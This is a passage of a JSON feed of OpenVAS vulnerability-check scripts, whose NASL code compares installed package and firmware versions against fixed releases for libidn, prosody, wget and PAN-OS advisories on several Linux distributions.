a\nrequest from HTTP to a crafted FTP resource. Palo Alto Networks software makes use of the vulnerable library and\nmay be affected.\");\n\n script_tag(name:\"affected\", value:\"PAN-OS 6.1.16 and earlier, PAN-OS 7.0.14 and earlier, PAN-OS 7.1.9 and\nearlier, PAN-OS 8.0.\");\n\n script_tag(name:\"solution\", value:\"Update to PAN-OS 6.1.17, PAN-OS 7.0.15, PAN-OS 7.1.10, PAN-OS 8.0.1 or\nlater.\");\n\n script_xref(name:\"URL\", value:\"https://securityadvisories.paloaltonetworks.com/Home/Detail/86\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!version = get_app_version(cpe: CPE, nofork: TRUE))\n exit(0);\n\nmodel = get_kb_item(\"palo_alto_pan_os/model\");\n\nif (version_is_less(version: version, test_version: \"6.1.17\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"6.1.17\");\n if (model)\n report += '\\nModel: ' + model;\n\n security_message(port: 0, data: report);\n exit(0);\n}\n\nif (version =~ \"^7\\.0\") {\n if (version_is_less(version: version, test_version: \"7.0.15\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"7.0.15\");\n if (model)\n report += '\\nModel: ' + model;\n\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nif (version =~ \"^7\\.1\") {\n if (version_is_less(version: version, test_version: \"7.1.10\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"7.1.10\");\n if (model)\n report += '\\nModel: ' + model;\n\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nif (version =~ \"^8\\.0\") {\n if (version_is_less(version: version, test_version: \"8.0.1\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"8.0.1\");\n if (model)\n report += '\\nModel: ' + model;\n\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:35:48", "bulletinFamily": "scanner", "description": "It was discovered that libidn, the GNU\nlibrary for Internationalized Domain Names (IDNs), did not correctly handle invalid\nUTF-8 input, causing an out-of-bounds read. This could allow attackers to disclose\nsensitive information from an application using the libidn library.", "modified": "2019-03-18T00:00:00", "published": "2016-05-14T00:00:00", "id": "OPENVAS:1361412562310703578", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703578", "title": "Debian Security Advisory DSA 3578-1 (libidn - security update)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3578.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Auto-generated from advisory DSA 3578-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703578\");\n script_version(\"$Revision: 14275 $\");\n script_cve_id(\"CVE-2015-2059\");\n script_name(\"Debian Security Advisory DSA 3578-1 (libidn - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-05-14 00:00:00 +0200 (Sat, 14 May 2016)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2016/dsa-3578.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(8|9)\");\n script_tag(name:\"affected\", value:\"libidn on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie), this\nproblem has been fixed in version 1.29-1+deb8u1.\n\nFor the testing distribution (stretch), this problem has been fixed\nin version 1.31-1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.31-1.\n\nWe recommend that you upgrade your libidn packages.\");\n script_tag(name:\"summary\", value:\"It was discovered that libidn, the GNU\nlibrary for Internationalized Domain Names (IDNs), did not correctly handle invalid\nUTF-8 input, causing an out-of-bounds read. This could allow attackers to disclose\nsensitive information from an application using the libidn library.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"idn\", ver:\"1.29-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libidn11:amd64\", ver:\"1.29-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libidn11:i386\", ver:\"1.29-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libidn11-dev\", ver:\"1.29-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libidn11-java\", ver:\"1.29-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"idn\", ver:\"1.31-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libidn11:amd64\", ver:\"1.31-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libidn11:i386\", ver:\"1.31-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libidn11-dev\", ver:\"1.31-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libidn11-java\", ver:\"1.31-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:27", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2015-05-11T00:00:00", "id": "OPENVAS:1361412562310869360", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869360", "title": "Fedora Update for prosody FEDORA-2015-6428", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for prosody FEDORA-2015-6428\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869360\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-05-11 05:51:51 +0200 (Mon, 11 May 2015)\");\n script_cve_id(\"CVE-2015-2059\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for prosody FEDORA-2015-6428\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'prosody'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"prosody on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-6428\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-May/157595.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"prosody\", rpm:\"prosody~0.9.8~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:17", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2015-07-30T00:00:00", "id": "OPENVAS:1361412562310869825", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869825", "title": "Fedora Update for libidn FEDORA-2015-11621", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for libidn FEDORA-2015-11621\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869825\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-07-30 05:08:44 +0200 (Thu, 30 Jul 2015)\");\n script_cve_id(\"CVE-2015-2059\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for libidn FEDORA-2015-11621\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libidn'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"libidn on Fedora 21\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-11621\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-July/162537.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC21\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC21\")\n{\n\n if ((res = isrpmvuln(pkg:\"libidn\", rpm:\"libidn~1.31~1.fc21\", rls:\"FC21\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:09", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2016-11-04T00:00:00", "id": "OPENVAS:1361412562310871702", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871702", "title": "RedHat Update for wget RHSA-2016:2587-02", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for wget RHSA-2016:2587-02\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871702\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-11-04 05:42:42 +0100 (Fri, 04 Nov 2016)\");\n script_cve_id(\"CVE-2016-4971\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for wget RHSA-2016:2587-02\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'wget'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The wget packages provide the GNU Wget file\nretrieval utility for HTTP, HTTPS, and FTP protocols.\n\nSecurity Fix(es):\n\n * It was found that wget used a file name provided by the server for the\ndownloaded file when following an HTTP redirect to a FTP server resource.\nThis could cause wget to create a file with a different name than expected,\npossibly allowing the server to execute arbitrary code on the client.\n(CVE-2016-4971)\n\nRed Hat would like to thank GNU wget project for reporting this issue.\nUpstream acknowledges Dawid Golunski as the original reporter.\n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 7.3 Release Notes linked from the References section.\");\n script_tag(name:\"affected\", value:\"wget on Red Hat Enterprise Linux Server (v. 7)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2016:2587-02\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2016-November/msg00023.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_7\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"wget\", rpm:\"wget~1.14~13.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wget-debuginfo\", rpm:\"wget-debuginfo~1.14~13.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:35:02", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-06-21T00:00:00", "id": "OPENVAS:1361412562310842802", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842802", "title": "Ubuntu Update for wget USN-3012-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for wget USN-3012-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842802\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-06-21 05:48:01 +0200 (Tue, 21 Jun 2016)\");\n script_cve_id(\"CVE-2016-4971\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for wget USN-3012-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'wget'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Dawid Golunski discovered that Wget\n incorrectly handled filenames when being redirected from an HTTP to an FTP URL.\n A malicious server could possibly use this issue to overwrite local files.\");\n script_tag(name:\"affected\", value:\"wget on Ubuntu 16.04 LTS,\n Ubuntu 15.10,\n Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3012-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3012-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|12\\.04 LTS|16\\.04 LTS|15\\.10)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"wget\", ver:\"1.15-1ubuntu1.14.04.2\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"wget\", ver:\"1.13.4-2ubuntu1.4\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"wget\", ver:\"1.17.1-1ubuntu1.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU15.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"wget\", ver:\"1.16.1-1ubuntu1.1\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:36:24", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2015-07-30T00:00:00", "id": "OPENVAS:1361412562310869803", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869803", "title": "Fedora Update for libidn FEDORA-2015-11562", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for libidn FEDORA-2015-11562\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869803\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-07-30 05:04:35 +0200 (Thu, 30 Jul 2015)\");\n script_cve_id(\"CVE-2015-2059\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for libidn FEDORA-2015-11562\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libidn'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"libidn on Fedora 22\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-11562\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-July/162549.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC22\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"libidn\", rpm:\"libidn~1.31~1.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:54:48", "bulletinFamily": "scanner", "description": "It was discovered that libidn, the GNU\nlibrary for Internationalized Domain Names (IDNs), did not correctly handle invalid\nUTF-8 input, causing an out-of-bounds read. This could allow attackers to disclose\nsensitive information from an application using the libidn library.", "modified": "2017-07-07T00:00:00", "published": "2016-05-14T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=703578", "id": "OPENVAS:703578", "title": "Debian Security Advisory DSA 3578-1 (libidn - security update)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3578.nasl 6608 2017-07-07 12:05:05Z cfischer $\n# Auto-generated from advisory DSA 3578-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703578);\n script_version(\"$Revision: 6608 $\");\n script_cve_id(\"CVE-2015-2059\");\n script_name(\"Debian Security Advisory DSA 3578-1 (libidn - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:05 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2016-05-14 00:00:00 +0200 (Sat, 14 May 2016)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2016/dsa-3578.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"libidn on Debian Linux\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie), this\nproblem has been fixed in version 1.29-1+deb8u1.\n\nFor the testing distribution (stretch), this problem has been fixed\nin version 1.31-1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.31-1.\n\nWe recommend that you upgrade your libidn packages.\");\n script_tag(name: \"summary\", value: \"It was discovered that libidn, the GNU\nlibrary for Internationalized Domain Names (IDNs), did not correctly handle invalid\nUTF-8 input, causing an out-of-bounds read. This could allow attackers to disclose\nsensitive information from an application using the libidn library.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"idn\", ver:\"1.29-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libidn11:amd64\", ver:\"1.29-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libidn11:i386\", ver:\"1.29-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libidn11-dev\", ver:\"1.29-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libidn11-java\", ver:\"1.29-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"idn\", ver:\"1.31-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libidn11:amd64\", ver:\"1.31-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libidn11:i386\", ver:\"1.31-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += 